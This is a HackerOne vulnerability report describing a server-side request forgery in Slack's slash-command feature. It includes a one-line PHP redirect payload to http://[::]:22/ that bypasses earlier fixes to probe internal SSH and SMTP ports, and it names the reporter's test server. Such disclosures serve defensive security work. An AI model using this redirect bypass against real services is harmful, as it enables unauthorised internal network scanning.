Slack: SSRF in api.slack.com, using slash commands and bypassing the protections.

2018-07-13T03:38:51
ID H1:381129
Type hackerone
Reporter elber
Modified 2019-02-22T20:58:21

Description

Bypassing the reports #61312 and #356765

Tutorial:

Go to api.slack.com and create an application with your own slash command. {F320014}

Enter your own domain: in your own domain: index.php

<?php header("location: http://[::]:22/"); ?>

location: http://[::]:22/

{F320019}

And save.

Go to your Slack and type /youslash

Try with my server http://206.189.204.187/

Results:

SSH {F320015}

SMNTP {F320016}

Impact

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources, and scan for internal ports and get the versions of the services running on the server.

Referer: https://www.owasp.org/index.php/Server_Side_Request_Forgery https://hackerone.com/reports/61312